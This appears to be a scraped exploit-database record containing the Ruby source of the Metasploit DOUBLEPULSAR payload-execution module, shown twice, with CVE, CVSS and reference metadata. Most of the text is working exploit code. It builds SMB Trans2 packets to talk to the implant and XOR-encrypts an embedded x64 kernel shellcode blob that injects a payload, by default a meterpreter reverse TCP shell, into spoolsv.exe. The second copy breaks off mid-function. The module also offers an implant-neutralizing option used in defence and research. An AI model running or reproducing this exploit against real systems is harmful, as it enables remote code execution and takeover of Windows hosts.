'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:19:02", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e1a5a9c279cbf621bea10a09715a227c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-08T00:17:28", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n 